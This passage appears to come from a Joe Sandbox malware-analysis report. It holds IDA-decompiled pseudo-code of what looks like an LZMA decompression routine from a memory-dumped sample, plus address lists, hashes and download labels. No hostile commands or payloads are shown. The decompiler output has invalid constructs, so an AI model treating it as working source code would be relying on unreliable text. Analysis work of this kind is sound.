												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x0040680d
0x0040680d
0x0040680d
0x0040680d
0x00406813
0x00406817
0x0040681b
0x00406825
0x00406833
0x00406b09
0x00406b09
0x00406b0c
0x00406b13
0x00406b40
0x00406b40
0x00406b44
0x00000000
0x00000000
0x00406b46
0x00406b4f
0x00406b55
0x00406b58
0x00406b5b
0x00406b5e
0x00406b61
0x00406b67
0x00406b80
0x00406b83
0x00406b8f
0x00406b90
0x00406b93
0x00406b69
0x00406b69
0x00406b78
0x00406b7b
0x00406b7b
0x00406b9d
0x00406b3d
0x00406b3d
0x00406b3d
0x00406b40
0x00406b44
0x00000000
0x00000000
0x00000000
0x00406b9f
0x00406b9f
0x00406b18
0x00406b1c
0x00406c54
0x00406c54
0x00406c5e
0x00406c66
0x00406c6d
0x00406c6f
0x00406c76
0x00406c7a
0x00406c7a
0x00406b22
0x00406b28
0x00406b2f
0x00406b37
0x00406b37
0x00406b3a
0x00000000
0x00406b3a
0x00406ba4
0x00406bb1
0x00406bb4
0x00406ac0
0x00406ac0
0x00406ac0
0x0040625c
0x0040625c
0x0040625c
0x00406265
0x00000000
0x00000000
0x0040626b
0x0040626b
0x00000000
0x00406272
0x00406276
0x00000000
0x00000000
0x0040627c
0x0040627f
0x00406282
0x00406285
0x00406289
0x00000000
0x00000000
0x0040628f
0x0040628f
0x00406292
0x00406294
0x00406295
0x00406298
0x0040629a
0x0040629b
0x0040629d
0x004062a0
0x004062a5
0x004062aa
0x004062b3
0x004062c6
0x004062c9
0x004062d5
0x004062fd
0x004062ff
0x0040630d
0x0040630d
0x00406311
0x00000000
0x00000000
0x00000000
0x00000000
0x00406301
0x00406301
0x00406304
0x00406305
0x00406305
0x00000000
0x00406301
0x004062d7
0x004062db
0x004062e0
0x004062e0
0x004062e9
0x004062f1
0x004062f4
0x00000000
0x004062fa
0x004062fa
0x00000000
0x004062fa
0x00000000
0x00406317
0x00406317
0x0040631b
0x00406bc7
0x00406bc7
0x00000000
0x00406bc7
0x00406321
0x00406324
0x00406334
0x00406337
0x0040633a
0x0040633a
0x0040633a
0x0040633d
0x00406341
0x00000000
0x00000000
0x00406343
0x00406343
0x00406349
0x00406373
0x00406379
0x00406380
0x00000000
0x00406380
0x0040634b
0x0040634f
0x00406352
0x00406357
0x00406357
0x00406362
0x0040636a
0x0040636d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004063b2
0x004063b8
0x004063bb
0x004063c8
0x004063d0
0x00000000
0x00000000
0x00406387
0x00406387
0x0040638b
0x00406bd6
0x00406bd6
0x00000000
0x00406bd6
0x00406391
0x00406397
0x004063a2
0x004063a2
0x004063a2
0x004063a5
0x004063a8
0x004063ab
0x004063b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a47
0x00406a47
0x00406a4d
0x00406a53
0x00406a59
0x00406a73
0x00406a76
0x00406a7c
0x00406a87
0x00406a87
0x00406a89
0x00406a5b
0x00406a5b
0x00406a6a
0x00406a6e
0x00406a6e
0x00406a93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a95
0x00406a99
0x00406c48
0x00406c48
0x00000000
0x00406c48
0x00406a9f
0x00406aa5
0x00406aac
0x00406ab4
0x00406ab7
0x00406aba
0x00406aba
0x00406ac0
0x00406ac0
0x00000000
0x00000000
0x004063d8
0x004063d8
0x004063da
0x004063dd
0x0040644e
0x0040644e
0x00406451
0x00406454
0x0040645b
0x00406465
0x00000000
0x00406465
0x004063df
0x004063df
0x004063e3
0x004063e6
0x004063e8
0x004063eb
0x004063ee
0x004063f0
0x004063f3
0x004063f5
0x004063fa
0x004063fd
0x00406400
0x00406404
0x0040640b
0x0040640e
0x00406415
0x00406419
0x00406421
0x00406421
0x00406421
0x0040641b
0x0040641b
0x0040641b
0x00406410
0x00406410
0x00406410
0x00406425
0x00406428
0x00406446
0x00406446
0x00406448
0x00000000
0x0040642a
0x0040642a
0x0040642a
0x0040642d
0x00406430
0x00406433
0x00406435
0x00406435
0x00406435
0x00406438
0x0040643b
0x0040643d
0x0040643e
0x00406441
0x00000000
0x00406441
0x00000000
0x00406677
0x00406677
0x0040667b
0x00406699
0x00406699
0x0040669c
0x004066a3
0x004066a6
0x004066a9
0x004066ac
0x004066af
0x004066b2
0x004066b4
0x004066bb
0x004066bc
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066c7
0x004066cc
0x00000000
0x004066cc
0x0040667d
0x0040667d
0x00406680
0x00406683
0x0040668d
0x00000000
0x00000000
0x004066e1
0x004066e1
0x004066e5
0x00406708
0x0040670b
0x0040670e
0x00406718
0x004066e7
0x004066e7
0x004066ea
0x004066ed
0x004066f0
0x004066fd
0x00406700
0x00406700
0x00000000
0x00000000
0x00406724
0x00406724
0x00406728
0x00000000
0x00000000
0x0040672e
0x0040672e
0x00406732
0x00000000
0x00000000
0x00406738
0x00406738
0x0040673a
0x0040673e
0x0040673e
0x00406741
0x00406745
0x00000000
0x00000000
0x00406795
0x00406795
0x00406799
0x004067a0
0x004067a0
0x004067a3
0x004067a6
0x004067b0
0x00000000
0x004067b0
0x0040679b
0x0040679b
0x00000000
0x00000000
0x004067bc
0x004067bc
0x004067c0
0x004067c7
0x004067ca
0x004067cd
0x004067c2
0x004067c2
0x004067c2
0x004067d0
0x004067d3
0x004067d6
0x004067d6
0x004067d9
0x004067dc
0x004067df
0x004067df
0x004067e2
0x004067e9
0x004067ee
0x00000000
0x00000000
0x0040687c
0x0040687c
0x00406880
0x00406c1e
0x00406c1e
0x00000000
0x00406c1e
0x00406886
0x00406886
0x00406889
0x0040688c
0x00406890
0x00406893
0x00406899
0x0040689b
0x0040689b
0x0040689b
0x0040689e
0x004068a1
0x00000000
0x00000000
0x00406471
0x00406471
0x00406475
0x00406be2
0x00406be2
0x00000000
0x00406be2
0x0040647b
0x0040647b
0x0040647e
0x00406481
0x00406485
0x00406488
0x0040648e
0x00406490
0x00406490
0x00406490
0x00406493
0x00406496
0x00406496
0x00406499
0x0040649c
0x00000000
0x00000000
0x004064a2
0x004064a2
0x004064a8
0x00000000
0x00000000
0x004064ae
0x004064ae
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064bf
0x004064c2
0x004064c4
0x004064ca
0x004064cd
0x004064d0
0x004064d3
0x004064d6
0x004064d9
0x004064dc
0x004064f8
0x004064fb
0x004064fe
0x00406501
0x00406508
0x0040650c
0x0040650e
0x00406512
0x004064de
0x004064de
0x004064e2
0x004064ea
0x004064ef
0x004064f1
0x004064f3
0x004064f3
0x00406515
0x0040651c
0x0040651f
0x00000000
0x00406525
0x00406525
0x00000000
0x00406525
0x00000000
0x0040652a
0x0040652a
0x0040652e
0x00406bee
0x00406bee
0x00000000
0x00406bee
0x00406534
0x00406534
0x00406537
0x0040653a
0x0040653e
0x00406541
0x00406547
0x00406549
0x00406549
0x00406549
0x0040654c
0x0040654f
0x0040654f
0x0040654f
0x00406555
0x00000000
0x00000000
0x00406557
0x00406557
0x0040655a
0x0040655d
0x00406560
0x00406563
0x00406566
0x00406569
0x0040656c
0x0040656f
0x00406572
0x00406575
0x0040658d
0x00406590
0x00406593
0x00406596
0x00406596
0x00406599
0x0040659d
0x0040659f
0x00406577
0x00406577
0x0040657f
0x00406584
0x00406586
0x00406588
0x00406588
0x004065a2
0x004065a9
0x004065ac
0x00000000
0x004065ae
0x004065ae
0x00000000
0x004065ae
0x004065ac
0x004065b3
0x004065b3
0x004065b3
0x004065b3
0x00000000
0x00000000
0x004065ee
0x004065ee
0x004065f2
0x00406bfa
0x00406bfa
0x00000000
0x00406bfa
0x004065f8
0x004065f8
0x004065fb
0x004065fe
0x00406602
0x00406605
0x0040660b
0x0040660d
0x0040660d
0x0040660d
0x00406610
0x00406613
0x00406613
0x00406619
0x004065b7
0x004065b7
0x004065ba
0x00000000
0x004065ba
0x0040661b
0x0040661b
0x0040661e
0x00406621
0x00406624
0x00406627
0x0040662a
0x0040662d
0x00406630
0x00406633
0x00406636
0x00406639
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665a
0x0040665d
0x00406661
0x00406663
0x0040663b
0x0040663b
0x00406643
0x00406648
0x0040664a
0x0040664c
0x0040664c
0x00406666
0x0040666d
0x00406670
0x00000000
0x00406672
0x00406672
0x00000000
0x00406672
0x00000000
0x004068ff
0x004068ff
0x00406903
0x00406c2a
0x00406c2a
0x00000000
0x00406c2a
0x00406909
0x00406909
0x0040690c
0x0040690f
0x00406913
0x00406916
0x0040691c
0x0040691e
0x0040691e
0x0040691e
0x00406921
0x00000000
0x00000000
0x004066cf
0x004066cf
0x004066d2
0x00000000
0x00000000
0x00406a0e
0x00406a0e
0x00406a12
0x00406a34
0x00406a34
0x00406a37
0x00406a41
0x00406a44
0x00406a44
0x00000000
0x00406a44
0x00406a14
0x00406a14
0x00406a17
0x00406a1b
0x00406a1e
0x00406a1e
0x00406a21
0x00000000
0x00000000
0x00406acb
0x00406acb
0x00406acf
0x00406aed
0x00406aed
0x00406aed
0x00406aed
0x00406af4
0x00406afb
0x00406b02
0x00406b02
0x00406b09
0x00406b0c
0x00406b13
0x00000000
0x00406b16
0x00406ad1
0x00406ad1
0x00406ad4
0x00406ad7
0x00406ada
0x00406ae1
0x00406a25
0x00406a25
0x00406a28
0x00000000
0x00000000
0x00406bbc
0x00406bbc
0x00406bbf
0x00406ac0
0x00406ac0
0x00406ac0
0x00000000
0x00406ac6
0x00000000
0x004067f6
0x004067f6
0x004067f8
0x004067ff
0x00406800
0x00406802
0x00406805
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b09
0x00406b09
0x00406b0c
0x00406b13
0x00000000
0x00406b16
0x00000000
0x00000000
0x00000000
0x0040683b
0x0040683b
0x0040683e
0x00406874
0x00406874
0x004069a4
0x004069a4
0x004069a4
0x004069a4
0x004069a7
0x004069a7
0x004069aa
0x004069ac
0x00406c36
0x00406c36
0x00000000
0x00406c36
0x004069b2
0x004069b2
0x004069b5
0x00000000
0x00000000
0x004069bb
0x004069bb
0x004069bf
0x004069c2
0x004069c2
0x004069c2
0x00000000
0x004069c2
0x00406840
0x00406840
0x00406842
0x00406844
0x00406846
0x00406849
0x0040684a
0x0040684c
0x0040684e
0x00406851
0x00406854
0x0040686a
0x0040686a
0x0040686f
0x004068a7
0x004068a7
0x004068ab
0x004068d4
0x004068d7
0x004068d9
0x004068e0
0x004068e3
0x004068e6
0x004068e6
0x004068eb
0x004068eb
0x004068ed
0x004068f0
0x004068f7
0x004068fa
0x00406927
0x00406927
0x0040692a
0x0040692d
0x004069a1
0x004069a1
0x004069a1
0x004069a1
0x00000000
0x004069a1
0x0040692f
0x0040692f
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x0040694a
0x0040694d
0x00406950
0x00406969
0x0040696b
0x0040696e
0x0040696f
0x00406972
0x00406974
0x00406977
0x00406979
0x0040697b
0x0040697e
0x00406980
0x00406983
0x00406987
0x00406989
0x00406989
0x0040698a
0x0040698d
0x00406990
0x00406952
0x00406952
0x0040695a
0x0040695f
0x00406961
0x00406964
0x00406964
0x00406993
0x0040699a
0x00406924
0x00406924
0x00406924
0x00406924
0x00000000
0x0040699c
0x0040699c
0x00000000
0x0040699c
0x0040699a
0x004068ad
0x004068ad
0x004068b0
0x004068b2
0x004068b5
0x004068b8
0x004068bb
0x004068bd
0x004068c0
0x004068c3
0x004068c3
0x004068c6
0x004068c6
0x004068c9
0x004068d0
0x004068a4
0x004068a4
0x004068a4
0x004068a4
0x00000000
0x004068d2
0x004068d2
0x00000000
0x004068d2
0x004068d0
0x00406856
0x00406856
0x00406859
0x0040685b
0x0040685e
0x00000000
0x00000000
0x004065bd
0x004065bd
0x004065c1
0x00406c06
0x00406c06
0x00000000
0x00406c06
0x004065c7
0x004065c7
0x004065ca
0x004065cd
0x004065d0
0x004065d3
0x004065d6
0x004065d9
0x004065db
0x004065de
0x004065e1
0x004065e4
0x004065e6
0x004065e6
0x004065e6
0x00000000
0x00000000
0x00406748
0x00406748
0x0040674c
0x00406c12
0x00406c12
0x00000000
0x00406c12
0x00406752
0x00406752
0x00406755
0x00406758
0x0040675b
0x0040675d
0x0040675d
0x0040675d
0x00406760
0x00406763
0x00406766
0x00406769
0x0040676c
0x0040676f
0x00406770
0x00406772
0x00406772
0x00406772
0x00406775
0x00406778
0x0040677b
0x0040677e
0x0040677e
0x0040677e
0x00406781
0x00406783
0x00406783
0x00000000
0x00000000
0x004069c5
0x004069c5
0x004069c5
0x004069c9
0x00000000
0x00000000
0x004069cf
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069da
0x004069da
0x004069da
0x004069dd
0x004069e0
0x004069e3
0x004069e6
0x004069e9
0x004069ec
0x004069ed
0x004069ef
0x004069ef
0x004069ef
0x004069f2
0x004069f5
0x004069f8
0x004069fb
0x004069fe
0x00406a02
0x00406a04
0x00406a07
0x00000000
0x00406a09
0x00406a09
0x00406786
0x00406786
0x00000000
0x00406786
0x00406a07
0x00406c3c
0x00406c3c
0x00000000
0x00000000
0x0040626b
0x00406c73
0x00406c73
0x00000000
0x00406c73
0x00406ac0
0x00406b40
0x00406b09

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50f9b3dbde316cd918bea018cc9741b8427272da75785f3d66779329da81c99a
Instruction ID: b067d01877f40e84a429b4471fca25dd3221b55ce60e5dbbd5d175d033de8b2f
Opcode Fuzzy Hash: 50f9b3dbde316cd918bea018cc9741b8427272da75785f3d66779329da81c99a
Instruction Fuzzy Hash: B5A15471E04228CBDF28CFA8C844BADBBB1FF45305F15806AD856BB281D3785A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406A0E Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406A0E() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406C7B))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4)); // executed
											}
											_t534 = GlobalAlloc("true", 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc("true",  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
